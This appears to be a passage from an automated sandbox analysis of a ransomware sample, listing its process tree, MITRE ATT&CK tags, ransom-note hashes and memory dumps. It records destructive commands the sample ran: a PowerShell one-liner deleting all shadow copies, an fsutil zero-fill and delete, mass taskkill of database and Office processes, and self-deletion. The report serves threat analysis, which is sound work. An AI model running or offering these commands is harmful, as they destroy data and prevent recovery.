- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1460
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:944
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:540
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1108
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1176
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:940
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1948
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:824
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1096
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\steriok.exe
  2⤵
  - Deletes itself
  PID:1216
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1176

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

MD5
3bd0f451a95e3c2db904c972b492b16b

SHA1
10d72542e9fd9c806e7962d21434f989dc42271e

SHA256
e0f5010038924b01ad18413ded11400b87f29440df8d8b5ca277b09939ac432b

SHA512
337637c25e71c98580e3c0b791aa1690a4f21bcb73ea8b89f4758540c83b742512ab867a7931753c4b4fa32b5d9ef014967768de04930a476cc3dd2b45cc0c78

Download Submit
memory/432-58-0x0000000000000000-mapping.dmp

Download
memory/432-114-0x0000000000000000-mapping.dmp

Download
memory/540-112-0x0000000000000000-mapping.dmp

Download
memory/616-67-0x0000000000000000-mapping.dmp

Download
memory/668-78-0x0000000000000000-mapping.dmp

Download
memory/824-122-0x0000000000000000-mapping.dmp

Download
memory/828-82-0x0000000000000000-mapping.dmp

Download
memory/832-59-0x0000000000000000-mapping.dmp

Download
memory/840-111-0x0000000000000000-mapping.dmp

Download
memory/916-94-0x0000000000000000-mapping.dmp

Download
memory/940-117-0x0000000000000000-mapping.dmp

Download
memory/944-87-0x0000000000000000-mapping.dmp

Download
memory/944-70-0x0000000000000000-mapping.dmp

Download
memory/944-106-0x0000000000000000-mapping.dmp

Download
memory/968-118-0x0000000000000000-mapping.dmp

Download
memory/968-120-0x00000000025C0000-0x000000000320A000-memory.dmp

Filesize
12.3MB

Download
memory/968-119-0x0000000075D41000-0x0000000075D43000-memory.dmp

Filesize
8KB

Download
memory/1032-95-0x0000000000000000-mapping.dmp

Download
memory/1044-102-0x0000000000000000-mapping.dmp

Download
memory/1044-73-0x0000000000000000-mapping.dmp

Download
memory/1052-79-0x0000000000000000-mapping.dmp

Download
memory/1064-74-0x0000000000000000-mapping.dmp

Download
memory/1080-60-0x0000000000000000-mapping.dmp

Download
memory/1096-124-0x0000000000000000-mapping.dmp

Download
memory/1108-115-0x0000000000000000-mapping.dmp

Download
memory/1112-99-0x0000000000000000-mapping.dmp

Download
memory/1164-91-0x0000000000000000-mapping.dmp

Download
memory/1176-116-0x0000000000000000-mapping.dmp

Download
memory/1180-96-0x0000000000000000-mapping.dmp

Download
memory/1196-93-0x0000000000000000-mapping.dmp

Download
memory/1196-71-0x0000000000000000-mapping.dmp

Download
memory/1216-113-0x0000000000000000-mapping.dmp

Download
memory/1252-98-0x0000000000000000-mapping.dmp

Download
memory/1252-80-0x0000000000000000-mapping.dmp

Download
memory/1380-85-0x0000000000000000-mapping.dmp

Download
memory/1436-66-0x0000000000000000-mapping.dmp

Download
memory/1460-105-0x0000000000000000-mapping.dmp

Download
memory/1460-83-0x0000000000000000-mapping.dmp

Download
memory/1464-75-0x0000000000000000-mapping.dmp

Download
memory/1508-97-0x0000000000000000-mapping.dmp

Download
memory/1516-92-0x0000000000000000-mapping.dmp

Download
memory/1528-107-0x0000000000000000-mapping.dmp

Download
memory/1540-90-0x0000000000000000-mapping.dmp

Download
memory/1588-110-0x0000000000000000-mapping.dmp

Download
memory/1592-103-0x0000000000000000-mapping.dmp

Download
memory/1596-72-0x0000000000000000-mapping.dmp

Download
memory/1608-62-0x0000000000000000-mapping.dmp

Download
memory/1612-84-0x0000000000000000-mapping.dmp

Download
memory/1640-104-0x0000000000000000-mapping.dmp

Download
memory/1648-89-0x0000000000000000-mapping.dmp

Download
memory/1648-101-0x0000000000000000-mapping.dmp

Download
memory/1668-69-0x0000000000000000-mapping.dmp

Download
memory/1692-61-0x0000000000000000-mapping.dmp

Download
memory/1696-81-0x0000000000000000-mapping.dmp

Download
memory/1712-77-0x0000000000000000-mapping.dmp

Download
memory/1716-109-0x0000000000000000-mapping.dmp

Download
memory/1716-76-0x0000000000000000-mapping.dmp

Download
memory/1720-65-0x0000000000000000-mapping.dmp

Download
memory/1820-88-0x0000000000000000-mapping.dmp

Download
memory/1832-100-0x0000000000000000-mapping.dmp

Download
memory/1936-68-0x0000000000000000-mapping.dmp

Download
memory/1948-63-0x0000000000000000-mapping.dmp

Download
memory/1948-121-0x0000000000000000-mapping.dmp

Download
memory/1956-108-0x0000000000000000-mapping.dmp

Download
memory/1988-64-0x0000000000000000-mapping.dmp

Download
memory/1988-86-0x0000000000000000-mapping.dmp

Download
memory/2024-55-0x0000000000350000-0x0000000000351000-memory.dmp

Filesize
4KB

Download
memory/2024-57-0x00000000049D0000-0x00000000049D1000-memory.dmp

Filesize
4KB

Download